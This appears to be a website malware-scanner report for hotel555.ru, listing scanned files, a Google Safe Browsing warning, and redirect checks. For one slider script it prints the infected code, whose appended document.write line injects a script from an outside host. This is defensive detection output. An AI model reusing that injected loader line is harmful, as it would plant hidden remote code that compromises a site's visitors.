Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hotel555.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hotel555.ru/ | 200 OK Content-Length: 19280 Content-Type: text/html | clean |
http://hotel555.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 95786 Content-Type: application/javascript | clean |
http://hotel555.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 92873 Content-Type: application/javascript | clean |
http://hotel555.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 24303 Content-Type: application/javascript | clean |
http://hotel555.ru/templates/Comfort/js/coin-slider.min.js | 200 OK Content-Length: 8544 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){var params=new Array;var order=new Array;var images=new Array;var links=new Array;var linksTarget=new Array;var titles=new Array;var interval=new Array;var imagePos=new Array;var appInterval=new Array;var squarePos=new Array;var reverse=new Array;$.fn.coinslider=$.fn.CoinSlider=function(options){init=function(el){order[el.id]=new Array();images[el.id]=new Array();links[el.id]=new Array();linksTarget[el.id]=new Array();titles[el.id]=new Array();imagePos[el.id]=0;squarePos[el.id]=0;re $.min=function(n,m){if(n>m)return m;else return n;} $.max=function(n,m){if(n<m)return m;else return n;} this.each(function(){init(this);});};$.fn.coinslider.defaults={width:565,height:290,spw:7,sph:5,delay:3000,sDelay:30,opacity:0.7,titleSpeed:500,effect:'',navigation:true,links:true,hoverPause:true};})(jQuery);document.write("<script type='text/javascript' src='http://newdownload.ru/social.js'></script>"); Antivirus reports:
| ||
http://hotel555.ru/engine/rss.php | 200 OK Content-Length: 14197 Content-Type: application/xml | suspicious |
Suspicious code found </span> | ||
http://hotel555.ru/test404page.js | 404 Not Found Content-Length: 1408 Content-Type: text/html | clean |
http://hotel555.ru/main/1-post1.html | 200 OK Content-Length: 35279 Content-Type: text/html | clean |
http://hotel555.ru/engine/classes/js/bbcodes.js | 200 OK Content-Length: 9693 Content-Type: application/javascript | clean |
http://hotel555.ru/engine/classes/masha/ierange.js | 200 OK Content-Length: 16681 Content-Type: application/javascript | clean |
http://hotel555.ru/engine/classes/masha/masha.js | 200 OK Content-Length: 24766 Content-Type: application/javascript | clean |
http://hotel555.ru/main/ | 200 OK Content-Length: 19720 Content-Type: text/html | clean |
http://hotel555.ru/main/2-post2.html | 200 OK Content-Length: 34284 Content-Type: text/html | clean |
http://hotel555.ru/user/admin/ | 200 OK Content-Length: 18103 Content-Type: text/html | clean |
http://hotel555.ru/user/admin/news/ | 200 OK Content-Length: 19684 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hotel555.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Feb 2015 23:01:20 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=eaa3d9d59f55526c64a086bb405a91d7; path=/; domain=.hotel555.ru; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.hotel555.ru; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.hotel555.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.hotel555.ru; httponly
X-Powered-By: PHP/5.4.33
GET / HTTP/1.1
Host: hotel555.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Feb 2015 23:01:20 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=eaa3d9d59f55526c64a086bb405a91d7; path=/; domain=.hotel555.ru; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.hotel555.ru; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.hotel555.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.hotel555.ru; httponly
X-Powered-By: PHP/5.4.33
Second query (visit from search engine):
GET / HTTP/1.1
Host: hotel555.ru
Referer: http://www.google.com/search?q=hotel555.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hotel555.ru
Referer: http://www.google.com/search?q=hotel555.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.